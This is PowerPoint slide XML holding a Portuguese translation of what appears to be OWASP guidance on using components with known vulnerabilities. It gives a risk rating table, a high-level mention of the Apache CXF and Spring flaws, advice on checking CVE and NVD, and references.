        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8208639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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3879809609"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2494720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1268760"/>
                <a:gridCol w="1224136"/>
                <a:gridCol w="1080120"/>
                <a:gridCol w="998984"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="564458">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a:p>
                  </a:txBody>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476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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIO</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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>GENERALIZADA</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marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DIFÍCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="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427342">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Alguns componentes vulneráveis (por exemplo, bibliotecas de framework) podem ser identificadas e exploradas com ferramen-tas automatizadas, expan-dindo o leque de agentes de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ameaça</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> incluindo,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> além de atacantes direcionados,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>atores caóticos.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O atacante identifica um componente vulnerável através de varredura ou análise manual. Ele personaliza o exploit conforme necessário e executa o ataque. Isso se torna mais difícil se o com-ponente usado está mais profundo na aplicação.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Virtualmente todas aplicações possuem estes problemas porque a maioria dos times de desenvolvimento não focam em garantir que seus componentes e/ou bibliotecas estejam atualizados. Em muitos casos, os desenvolvedores sequer conhecem todos os componentes que estão usando, muito menos suas versões. Dependências de componentes tornam a situação ainda</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pior.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" baseline="0" dirty="0" smtClean="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A gama completa de vulnerabilidades é possível, incluindo injeção, falha no controle de acesso, XSS, etc. O impacto poderia variar do mínimo ao completo comprometimento do servidor e dos dados.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o que cada vulnerabilidade pode significar para o negócio controlado pela aplicação afetada. Ela pode ser trivial ou pode significar o comprometimento completo.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplo de Cenários de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilidades de componentes podem causar quase qualquer tipo de risco imaginável, variando do malware trivial ao sofisticado desenvolvido para atingir uma organização específica. Componentes quase sempre executam com todos os privilégios de uma aplicação, então falhas em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qualquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> componente podem ser sérias. Os dois seguintes componentes vulneráveis foram baixados 22m de vezes em 2011. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Apache CXF Authentication Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ao não fornecer um token de identidade, atacantes podem chamar qualquer serviço web com todas as permissões. (Apache CXF é um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>framework de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serviços, não deve ser confundido com o Servidor de Aplicação Apache.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Spring Remote Code Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abuso da implementação de Linguagem Expression no Spring permitiu aos atacantes executarem código arbitrário, efetivamente comprometendo o servidor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toda aplicação utilizando qualquer dessas bibliotecas vulneráveis está vulnerável a ataques já que ambos componentes são diretamente acessíveis por usuários da aplicação. Outras bibliotecas vulneráveis, usadas mais profundamente em uma aplicação, podem ser mais difíceis de explorar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3491880"/>
            <a:ext cx="3383280" cy="283272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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Em teoria, deveria ser fácil de descobrir se você está atualmente utilizando quaisquer componentes ou bibliotecas vulneráveis. Infelizmente, relatórios de vulnerabilidades de software comercial ou livre nem sempre especificam exatamente quais versões de um componente estão vulneráveis de uma forma padrão, pesquisável. Além disso, nem todas as bibliotecas utilizam um sistema de numeração de versões compreensível. Pior ainda, nem todas as vulnerabilidades são reportadas para um local central que seja fácil de pesquisar, apesar de sites como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> estejam se tornando mais fáceis de pesquisar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Determinar se você está vulnerável requer pesquisar nesses bancos de dados, bem como manter-se a par de listas de e-mails e anúncios para qualquer coisa que possa ser uma vulnerabilidade. Se um de seus componentes tiver uma vulnerabilidade, você deve avaliar cuidadosamente se está realmente vulnerável verificando se seu código utiliza a parte do componente com a vulnerabilidade e se a falha poderia resultar em um impacto que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preocupe você. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Good Component Practices Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>The Unfortunate Reality of Insecure Libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Open Source Software Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Addressing Security Concerns in Open Source Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
